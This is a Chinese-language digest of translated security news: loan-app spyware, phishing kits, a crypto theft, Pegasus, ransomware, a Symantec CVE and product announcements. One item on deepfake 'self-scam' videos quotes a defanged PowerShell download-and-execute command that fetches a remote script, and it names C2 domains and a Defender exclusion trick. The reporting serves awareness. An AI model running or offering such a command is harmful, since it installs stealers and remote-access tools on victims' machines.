SpyLend 安卓恶意软件从 Google Play 下载量超 10 万次
HackerNews 编译,转载请注明出处: 一款名为 SpyLend 的安卓恶意软件应用已在 Google Play 上下载超过 10 万次,该应用伪装成金融工具,但实际上是一个针对印度用户的掠夺性贷款应用。 该应用属于一系列名为 “SpyLoan” 的恶意安卓应用程序,这些应用伪装成合法的金融工具或贷款服务,但实际上会从设备中窃取数据,用于掠夺性贷款。 这些应用以快速、便捷的贷款承诺吸引用户,通常要求的文件很少,提供的条件也很有吸引力。然而,安装后,它们会请求过多的权限,允许应用窃取个人数据,如联系人、通话记录、短信、照片和设备位置。 这些被窃取的信息随后被用于骚扰、敲诈和勒索用户,特别是当他们未能满足应用的还款条款时。 贷款诈骗和敲诈 网络安全公司 CYFIRMA 发现了一款名为 “Finance Simplified” 的安卓应用,该应用声称是一个金融管理应用,并在 Google Play 上获得了 10 万次下载。 然而,CYFIRMA 表示,该应用在某些国家(如印度)表现出更恶意的行为,从用户的设备中窃取数据,用于掠夺性贷款。研究人员还发现了其他恶意 APK,似乎是同一恶意软件活动的变种,分别是 KreditApple、PokketMe 和 StashFur。 尽管该应用现已从 Google Play 上移除,但它可能继续在后台运行,从受感染的设备中收集敏感信息。 恶意应用在 Google Play 上 Google Play 上 “Finance Simplified” 的多条用户评论显示,该应用提供的贷款服务会试图敲诈借款人,如果他们不支付高利率。 “非常非常非常糟糕的应用,他们提供的贷款金额很低,并且会勒索支付高额利息,否则会将照片编辑成裸照并进行勒索,”一位用户对这款已被下架的应用进行了评价。 这些应用还声称自己是注册的非银行金融机构(NBFC),但 CYFIRMA 表示这是不真实的。 为了在 Google Play 上躲避检测,Finance Simplified 使用 WebView 将用户重定向到外部网站,从那里下载托管在 Amazon EC2 服务器上的贷款应用 APK。 “Finance Simplified 应用似乎专门针对印度用户,显示并推荐贷款应用,加载一个 WebView,显示一个重定向到外部网站的贷款服务,从那里下载一个单独的贷款 APK 文件,”CYFIRMA 解释道。 研究人员发现,如果用户的位置是印度,该应用只会加载具有欺骗性的界面,这表明该活动具有特定的目标。 应用窃取的敏感数据 该恶意软件活动更令人担忧的方面是数据收集,包括存储在用户设备上的敏感个人信息。 以下是该恶意软件窃取的数据摘要: – 联系人、通话记录、短信和设备详细信息。 – 来自内部和外部存储的照片、视频和文档。 – 实时位置跟踪(每 3 秒更新一次)、历史位置数据和 IP 地址。 – 最近复制到剪贴板的 20 条文本输入。 – 贷款历史和银行短信交易记录。 尽管这些数据主要用于敲诈那些错误地申请贷款的受害者,但也可能用于金融诈骗或转售给网络犯罪分子以牟利。 SpyLend 运营概述 如果您怀疑您的设备被上述任何应用或类似应用感染,请立即删除它们,重置权限,更改银行账户密码,并进行设备扫描。 Google 的 Play Protect 工具可以检测并阻止已知的恶意软件和掠夺性应用,因此请确保您的设备上已激活该工具。 消息来源:Bleeping Computer; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
谷歌云在 KMS 中引入量子安全数字签名
HackerNews 编译,转载请注明出处: 谷歌云宣布在其云密钥管理服务(Cloud KMS)中引入量子安全数字签名功能,目前该功能已在预览版中提供。 这家科技巨头表示,这一举措符合美国国家标准与技术研究院(NIST)的后量子密码学(PQC)标准,旨在应对量子计算可能破坏经典加密方案的未来风险。 鉴于谷歌云被金融机构、大型企业、政府机构、关键基础设施单位和软件开发者广泛使用,引入量子安全加密对于保护敏感数据免受高级攻击至关重要。 量子就绪的 Cloud KMS Cloud KMS 是谷歌云的加密密钥管理工具,用于安全地生成、存储和管理用于加密和签名数据的加密密钥。 使用传统的公钥密码学(如 RSA 和 ECC),客户面临未来通过所谓的“现在收集,以后解密”(HNDL)攻击暴露数据的风险。 尽管目前尚不存在能够破解当前加密方案的量子计算机,但所有专家都一致认为 HNDL 风险过高,不可忽视。微软宣布其 Majorana 1 芯片取得突破,这标志着向构建未来量子计算机迈出了关键一步,进一步加剧了这一担忧。 为了帮助保护我们的数据免受未来量子计算的威胁,谷歌现在正在将抗量子密码学集成到 Cloud KMS(软件)和 Cloud HSM(硬件安全模块)中。 采用的两种算法是 ML-DSA-65(FIPS 204),一种基于格的数字签名算法,以及 SLH-DSA-SHA2-128S(FIPS 205),一种无状态的基于哈希的数字签名算法。 “今天,我们很高兴地宣布在谷歌云密钥管理服务(Cloud KMS)中推出量子安全数字签名(FIPS 204/FIPS 205),用于软件密钥,目前该功能已在预览版中提供,”谷歌在公告中表示。 “我们还分享了谷歌云加密产品的后量子战略的高层次视图,包括 Cloud KMS 和我们的硬件安全模块(Cloud HSM)。” Cloud KMS 现在允许用户使用这些新的 PQC 算法进行数字签名的签名和验证,就像使用传统密码学一样。 这些加密实现将通过 BoringCrypto 和 Tink 库开源,保持透明度并允许独立的安全审计。 谷歌邀请各组织开始测试和集成抗量子算法到现有部署中,并报告他们的反馈,以帮助解决任何问题。 消息来源:Bleeping Computer; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
网络犯罪分子利用 Darcula PhaaS v3 在几分钟内克隆任何品牌的网站
HackerNews 编译,转载请注明出处: 网络犯罪分子现在可以利用 Darcula PhaaS 平台的最新版本 v3,在几分钟内克隆任何品牌的网站,进一步降低了大规模实施网络钓鱼攻击所需的技术门槛。 这一最新版本的网络钓鱼工具 “代表着犯罪能力的重大转变,降低了坏人针对任何品牌发起复杂、可定制网络钓鱼活动的门槛,” 网络安全公司 Netcraft 在一份新分析报告中指出。 Netcraft 表示,自 2024 年 3 月底首次曝光 Darcula 以来,已检测并阻止了超过 95,000 个新的 Darcula 网络钓鱼域名、近 31,000 个 IP 地址,并关闭了超过 20,000 个欺诈网站。 Darcula 最大的变化是允许任何用户按需生成任何品牌的网络钓鱼工具包。 “新的重制版本现已准备好进行测试,” 该服务的核心开发人员于 2025 年 1 月 19 日在一个拥有超过 1,200 名订阅者的 Telegram 频道中发布消息表示。 “现在,你还可以自己定制前端。使用 darcula-suite,你可以在 10 分钟内完成前端的制作。” 要做到这一点,客户只需在网页界面中提供要冒充品牌的 URL,平台将使用浏览器自动化工具(如 Puppeteer)导出 HTML 和所有所需资源。 用户随后可以选择要替换的 HTML 元素并注入网络钓鱼内容(例如支付表单和登录字段),使其与品牌登陆页面的外观和感觉相匹配。生成的网络钓鱼页面随后上传到管理面板。 “像任何 SaaS 产品一样,darcula-suite PhaaS 平台提供管理仪表板,使欺诈者可以轻松管理他们的各种活动,” 安全研究员 Harry Freeborough 表示。 “一旦生成,这些工具包将上传到另一个平台,犯罪分子可以在该平台上管理他们的活跃活动、查找提取的数据并监控已部署的网络钓鱼活动。” 除了提供展示网络钓鱼活动聚合性能统计信息的仪表板外,Darcula v3 还进一步提供了一种方法,将被盗的信用卡详细信息转换为受害者的虚拟卡片图像,可以扫描并添加到数字钱包中用于非法目的。具体来说,这些卡片被加载到一次性手机上并出售给其他犯罪分子。 该工具目前处于内部测试阶段。在 2025 年 2 月 10 日的后续帖子中,恶意软件作者发布消息表示:“我最近很忙,所以 v3 更新将推迟几天。” 消息来源:The Hacker News; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
因政府要求加密后门,苹果在英取消 iCloud 高级数据保护功能
HackerNews 编译,转载请注明出处: 苹果公司周五宣布,由于英国政府要求获得加密用户数据的后门访问权限,将立即在英国移除 iCloud 的高级数据保护(ADP)功能。 据彭博社首次报道,ADP 是 iCloud 的一个可选设置,确保用户的受信任设备唯一持有用于解锁存储在云端数据的加密密钥。这包括 iCloud 备份、照片、笔记、提醒、Safari 书签、语音备忘录以及与苹果自家应用相关的数据。 “鉴于数据泄露和其他对客户隐私的威胁不断增加,我们对无法在英国为客户提供 ADP 保护感到非常失望,”苹果公司被引用对彭博社表示。“ADP 通过端到端加密保护 iCloud 数据,这意味着数据只能由拥有它的用户在其受信任设备上解密。” 据报道,已经使用 ADP 的用户需要在尚未指定的时间内手动禁用该功能,因为苹果“无法代表他们自动禁用它。” 这一前所未有的举措仅在数周前,有报道称英国政府已下令苹果建立后门以访问任何苹果用户的 iCloud 内容。 据《华盛顿邮报》报道,该要求由英国内政部根据《调查权力法》(IPA),也称为《窥探者宪章》,发出,“要求全面能力以查看完全加密的材料,而不仅仅是协助破解特定账户。” 随着在该地区移除 ADP,苹果现在只为 iCloud 提供标准数据保护,该保护加密用户数据但将加密密钥存储在其自己的数据中心,从而使执法部门在获得搜查令的情况下可以访问这些数据。 上周,美国参议员罗恩·怀登和众议员安迪·比格斯致函国家情报总监图尔西·加巴德,敦促英国撤回其命令,称这威胁到美国人民和美国政府的隐私和安全。 “如果英国不立即逆转这一危险行为,我们敦促你重新评估美英网络安全安排和项目以及美国与英国的情报共享,”他们补充道。 消息来源:The Hacker News; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
创纪录的 14.6 亿美元加密货币盗窃案为复杂冷钱包攻击所致
HackerNews 编译,转载请注明出处: 加密货币交易所 Bybit 周五披露,一起“复杂”的攻击导致其一个以太坊冷(离线)钱包中的超过 14.6 亿美元的加密货币被盗,这成为有史以来最大的单次加密货币盗窃案。 Bybit 在 X 上的一篇帖子中表示:“此次事件发生在我们的 ETH 多签冷钱包向热钱包执行转账时。不幸的是,这笔交易通过一种复杂的攻击被操纵,该攻击掩盖了签名界面,显示正确的地址的同时修改了底层的智能合约逻辑。” “结果,攻击者能够控制受影响的 ETH 冷钱包,并将其资产转移到一个未知地址。” Bybit 首席执行官 Ben Zhou 在社交媒体平台上发布的另一份声明中强调,所有其他冷钱包都是安全的。公司进一步表示已向有关部门报告了此案。 虽然 Bybit 尚未正式确认,但 Elliptic 和 Arkham Intelligence 确认这起数字盗窃案是由臭名昭著的 Lazarus Group 所为。这起事件成为迄今为止报告的最大加密货币盗窃案,超过了 Ronin Network(6.24 亿美元)、Poly Network(6.11 亿美元)和 BNB Bridge(5.86 亿美元)的盗窃案。 独立研究员 ZachXBT 表示,他们“将 Bybit 黑客攻击与 Phemex 黑客攻击联系起来”,后者发生在上个月末。 这个总部位于朝鲜的威胁行为体是最多产的黑客组织之一,策划了数十起加密货币盗窃案,为受制裁的国家生成非法收入。去年,谷歌将朝鲜描述为“可以说是世界上领先的网络犯罪企业”。 2024 年,据估计该组织在 47 起加密货币攻击中窃取了 13.4 亿美元,占该时期所有非法加密货币的 61%,区块链情报公司 Chainalysis 表示。 谷歌旗下的 Mandiant 上个月表示:“由于加密货币劫案的高收益、归因于恶意行为者的挑战以及许多组织对加密货币和 Web3 技术的初步熟悉,加密货币劫案正在增加。” 消息来源:The Hacker News; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
新一波 “自骗” 攻击利用 AI 生成的深度伪造视频
HackerNews 编译,转载请注明出处: 新一波的 “自骗” 攻击浪潮正在利用 AI 生成的深度伪造视频和恶意脚本,目标锁定加密货币爱好者和金融交易者,标志着社会工程战术的危险演变。 据网络安全研究公司 Gen Digital 发现,这场活动利用经过验证的 YouTube 频道、合成人物和 AI 制作的有效载荷,操纵受害者主动破坏自己的系统。 这种攻击在 2024 年第三季度激增了 614%,结合了尖端的深度伪造技术和精心设计的心理诱饵,引发了对生成式 AI 在网络犯罪中武器化的紧迫担忧。 安全分析师指出,该操作始于一个托管在拥有 11 万订阅者的被攻陷 YouTube 频道上的深度伪造视频。 视频中出现了一个名为 “托马斯・哈里斯” 或 “托马斯・罗伯茨” 的合成人物,利用先进的面部动画、语音合成和身体动作复制技术制作而成。 尽管该频道看起来合法,包括从 TradingView 重新发布的内 容,但未列出的教程视频指导观众激活一个虚构的 “AI 驱动的开发者模式”,声称该模式可以以 97% 的准确率预测加密货币市场趋势。 攻击的核心在于使用 AI 生成的脚本设计来规避怀疑。观众被引导打开 Windows 的运行对话框(Win+R)并执行一个从 paste-sharing 网站(如 Pastefy[.]com 或 Obin[.]net)获取恶意脚本的 PowerShell 命令。 研究人员解密的一个代表性有效载荷显示攻击者使用 ChatGPT 来优化他们的代码: iex (New-Object Net.WebClient).DownloadString(‘hxxps://pastefy[.]com/raw/AbCdE123’) 该脚本连接到一个命令与控制(C&C)服务器——最近被追踪为 developer-update[.]dev 或 developerbeta[.]dev——以部署 Lumma Stealer 或 NetSupport 远程访问工具。 前者窃取加密货币钱包和浏览器凭据,而后者则授予对系统的完全控制。取证分析揭示了关键组件的 SHA-256 哈希值,包括: a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797(恶意 PowerShell 脚本) 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e(Lumma Stealer 变种) 至关重要的是,深度伪造视频通过程序细节隐藏了其人工性质——一个合成声音解释了如何通过添加注册表排除项来绕过 Windows Defender,而屏幕上的按键操作则模仿了真实的 TradingView 工作流程。 攻击者还通过 YouTube 的赞助广告系统进一步扩大了攻击范围,针对观看合法金融内容的用户。 与传统的网络钓鱼不同,受害者主动参与了他们的系统被破坏的过程,认为他们正在访问独家工具。随着网络犯罪分子现在正在自动化人物创建和脚本优化,通过多个渠道验证数字指令已成为一种不可或缺的安全实践。 消息来源:Cybersecurity News; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
以色列“飞马” 间谍软件感染欧洲多部私营部门手机
HackerNews 编译,转载请注明出处: 移动设备安全公司 iVerify 的新发现表明,强大的零点击间谍软件的使用范围比之前理解的更为广泛,不仅影响民间社会成员,还波及企业高管。 iVerify 在周三宣布,仅在 12 月份,就在其测试的 18,000 台唯一设备中检测到了 11 台感染了 “飞马” 间谍软件。 iVerify 此前在 12 月份表示,自 5 月份首次提供诊断扫描服务以来,在提交测试的 3,000 部手机中发现了 7 部感染了 “飞马” 间谍软件。关于这些检测的新闻报道导致 iVerify 的威胁狩猎应用程序的使用范围更广,涵盖了更主流的用户群体。 该公司描述的最新受害者均在私营行业工作,包括房地产、物流和金融领域,只有一位是欧洲政府官员。愿意透露其所在地的受害者来自瑞士、波兰、巴林、西班牙、捷克共和国和亚美尼亚。 “飞马” 间谍软件由以色列公司 NSO Group 制造,多年来一直面临质疑,因为尽管该公司声称其产品仅出售给针对犯罪分子和恐怖分子的政府,但该间谍软件仍频繁出现在民间社会的手机中。零点击间谍软件无需与设备所有者直接交互即可安装。 iVerify 应用程序下载费用为 1 美元,用户可以每月扫描一次手机,检测高级商业间谍软件。设备所有者只需按照几个简单的步骤创建一个诊断文件,iVerify 将在几小时内完成评估。 该公司的扫描通过查找恶意软件签名并部分依赖机器学习来发现间谍软件感染的迹象和设备中的异常情况。 据 iVerify 称,新确认的检测发现了 2021-2023 年间的已知 “飞马” 变种,许多受害者被多种变种攻击。iVerify 表示,有些受害者被监视了数年。 iVerify 表示,仍在研究多个额外案例,这些案例中的法医痕迹表明可能存在潜在攻击。 企业高管成为 “飞马” 间谍软件的目标,为这场间谍软件危机增添了新的维度。这些高管可以接触到秘密的公司计划、财务数据,并且经常与其他在幕后进行敏感工作的有影响力的私营部门领导人交流,包括那些可能影响金融市场的交易。 迄今为止,大多数已知的 “飞马” 感染案例涉及记者、人权活动家、政治家和其他民间社会成员。 “从安全角度来看,世界对这种情况完全没有准备,” iVerify 联合创始人、前国家安全局分析师 Rocky Cole 在采访中表示。“这种情况比人们想象的要普遍得多。” Cole 表示,在最近的扫描中,只有一半被发现感染了 “飞马” 间谍软件的手机用户收到了苹果公司的威胁通知。 Cole 表示,公司只报告了 “真正阳性” 的 “飞马” 检测结果,并未包括那些无法通过独立外展验证身份的用户。 iVerify 还测试了其他类型的间谍软件,包括 Paragon(Graphite)、QuaDream(Reign)和 Intellexa(Predator)的产品,但这项新研究仅包括感染了 “飞马” 间谍软件的手机检测结果。 消息来源:The Record; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
美国最大报业企业因勒索软件攻击导致报纸发行中断
HackerNews 编译,转载请注明出处: 美国媒体公司Lee企业(Lee Enterprises)公布了最近一次网络攻击的更多细节,透露攻击者加密并窃取了文件。 Lee企业在 25 个州拥有 350 家周报和专业出版物。据新闻自由追踪器报道,至少有 75 家报纸受到了网络攻击的影响。 Lee企业首次向美国证券交易委员会(SEC)报告网络攻击时,表示由于 “网络安全事件”,公司在 2 月 3 日遭遇了技术故障。其许多出版物的运营受到了影响,包括印刷报纸、订阅账户和内部服务。 在周二向 SEC 提交的更新中,Lee企业没有明确表示遭受了勒索软件攻击,但根据目前的调查,威胁行为者侵入了其网络,加密了关键应用程序并窃取了某些文件,这符合典型的勒索软件攻击特征。 Lee企业正在进行法医分析,以确定是否有个人或敏感信息因黑客攻击而泄露。 “此次事件影响了公司的运营,包括产品分发、账单、收款和供应商付款。我们产品组合中的印刷出版物分发出现了延迟,在线运营也部分受限,” Lee企业向 SEC 表示。 该公司补充说:“截至 2025 年 2 月 12 日,所有核心产品已恢复正常分发节奏,但周报和附属产品尚未恢复。这些产品占公司总运营收入的 5%。公司预计将在未来几周内逐步恢复这些业务。” 这家媒体巨头预计此次事件将产生重大影响,但财务影响的全部范围尚未确定。 SecurityWeek 尚未发现任何已知的勒索软件组织声称对此次攻击负责。 目前尚不清楚Lee企业是否支付了赎金或正在考虑这一选项,但公司指出,它确实拥有一份 “全面的网络安全保险政策,涵盖与事件响应、法医调查、业务中断和监管罚款相关的费用,但需遵守保单限额和免赔额”。 消息来源:Security Week; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
赛门铁克诊断工具漏洞允许攻击者提升权限
HackerNews 编译,转载请注明出处: 赛门铁克(Symantec),博通(Broadcom)的一个部门,已解决了其诊断工具(SymDiag)中的一个关键安全漏洞(CVE-2025-0893),该漏洞可能允许攻击者在受影响的系统上提升权限。 该漏洞影响 SymDiag 3.0.79 之前的版本,由于其可能通过本地利用威胁机密性、完整性和可用性,因此获得了 CVSSv3 7.8(高严重性)的评分。 该漏洞源于 SymDiag 的权限管理不当,这是一个用于排查赛门铁克产品(如 Web 安全服务(WSS)代理)问题的工具。 具有低权限访问的攻击者可以利用此漏洞以提升的权限执行任意代码,从而有效绕过安全控制。 该问题特别影响 SymDiag 与 WSS 代理交互的系统,WSS 代理是赛门铁克安全 Web 网关(SWG)解决方案的一个组件,用于流量重定向和云安全强制执行。 根据博通的咨询,该漏洞存在于 SymDiag 在收集诊断数据期间处理进程提升的方式中。 成功的利用可能使未经授权访问敏感系统资源、修改安全配置或中断终端保护服务。 尽管尚未记录任何公开利用,但 SymDiag 的诊断功能与 WSS 代理的网络级权限相结合,如果未修补,将创建高风险场景。 缓解和补丁部署 赛门铁克已在 SymDiag 3.0.79 中解决了此问题,该版本已通过赛门铁克终端保护管理器(SEPM)自动部署到所有受影响的终端。 更新移除了旧的易受攻击版本的 SymDiag,确保使用托管部署的企业客户无需手动干预。 对于独立安装,建议用户通过工具的界面或命令行实用程序验证其 SymDiag 版本。 虽然补丁缓解了 immediate risk,但博通强调了更广泛的安全强化措施: 最小权限原则:限制管理访问仅限授权人员,并对终端管理工具实施基于角色的访问控制(RBAC)。 网络分段:隔离管理接口并限制远程访问仅限受信任的 IP 范围。 深度防御:部署入侵检测系统(IDS)和终端检测与响应(EDR)工具,以监控异常活动,特别是在使用旧版 WSS 代理配置的环境中。 CVE-2025-0893 对使用 SymDiag 与赛门铁克 WSS 代理结合的组织构成了针对性但严重的风险。 迅速的补丁部署展示了博通对其零信任路线图的承诺,尽管管理员应审计旧系统以查找潜在的残留漏洞。 随着云安全工具越来越多地处理解密流量和特权操作,供应商必须在诊断功能与严格的访问控制之间取得平衡,以防止在违规情况下发生横向移动。 消息来源:Cybersecurity News; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
诺顿推出 AI 驱动的反诈骗功能,全面应对社交工程威胁
HackerNews 编译,转载请注明出处: 诺顿(Norton)通过一系列集成在其诺顿网络安全产品中的 AI 驱动功能,为诈骗防护设定了新标准,帮助人们抵御当今最普遍的网络威胁。 诈骗如同多米诺骨牌的第一块倾倒,会引发一系列严重攻击,包括身份盗窃和金融欺诈。该公司报告称,如今 90% 的网络威胁源自诈骗和社会工程威胁,这一数字自 2021 年以来几乎增加了三倍。 从今天起,Genie Scam Protection 和 Genie Scam Protection Pro 在美国的诺顿网络安全产品系列中上线,提供 AI 防护,覆盖短信、电话、电子邮件和网络等诈骗高发领域。诺顿 Genie AI 如同侦探寻找线索一样,分析词语的含义而不仅仅是链接,以发现即使最谨慎的人也可能忽略的隐藏诈骗模式。诺顿最全面的计划——带有 LifeLock Ultimate Plus 的 Norton 360,还提供诈骗支持和赔偿保障,为用户提供更大的安心。 2023 年,诺顿推出了首个使用 AI 对可疑消息和图像进行实时分析的应用程序——Norton Genie。随着数百万人使用 Norton Genie 获取关于潜在诈骗的即时帮助和建议,为 Genie 提供支持的 AI 不断学习,变得更加有效。现在,随着增强的 Genie Scam Protection 直接集成到诺顿计划中,诺顿提供了全面的“设置后无需操心”的诈骗防护,主动帮助人们在互联世界中保持安全。 “如今的诈骗不再是肉眼一眼就能识破的那种,”Gen 的首席产品官 Leena Elias 表示。“诈骗者利用 AI 加速他们的计划,使其更具可信度。再加上我们每天收到的大量电子邮件、短信和电话,显然我们需要技术来帮助我们避免成为下一个诈骗受害者。我们已在诺顿产品中直接构建了增强的 AI 驱动诈骗防护,为客户提供强大、始终在线的诈骗防御,以保护他们的数字和金融安全。我们的顶级计划通过主动诈骗防护以及诈骗支持和赔偿来帮助保护您,如果您不幸成为诈骗的受害者,这些支持和赔偿可以帮助您恢复原状。” Genie Scam Protection 功能作为诺顿网络安全产品的一部分,在桌面和移动设备上免费提供,包括 Norton AntiVirus Plus、Norton Mobile Security 和 Norton 360 计划。主要功能包括: 安全短信:利用诺顿 Genie AI 检测短信中的复杂诈骗,通过分析诈骗者使用的词语含义。仅在移动设备上提供,这是您最需要的地方。 安全网络:在在线购物或浏览时提供先进的 AI 骗局防护。 Genie AI 驱动的诈骗助手:集成诺顿 Genie AI 应用程序,只需一键即可提供关于诈骗和可疑优惠的即时指导。 诺顿隐私浏览器:阻止网络钓鱼诈骗和烦人的广告,帮助人们自信地浏览、银行和购物。此功能可在诺顿隐私浏览器的桌面版本上使用。 除了 Genie Scam Protection 之外,使用带有 LifeLock 的 Norton 360 的客户还拥有 Genie Scam Protection Pro,其中包括: 安全通话:利用 AI 自动阻止诈骗电话,或将来电标记为诈骗、垃圾电话或业务电话,让人们知道是否应该接听。 诈骗支持和赔偿:获得帮助追回因诈骗而损失的钱款。专门的向导将协助追回丢失的资金。 安全电子邮件:主动扫描电子邮件,使用诺顿 Genie AI 检测隐藏的诈骗模式,并在发现可疑情况时发出警告,帮助在打开邮件之前发现复杂诈骗。 新的 Genie Scam Protection 和 Scam Protection Pro 功能今天在美国支持的平台上上线。英国、澳大利亚和新西兰的诺顿网络安全计划也将收到 Genie Scam Protection 绑定包中的所有功能。 消息来源:Help Net Security; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文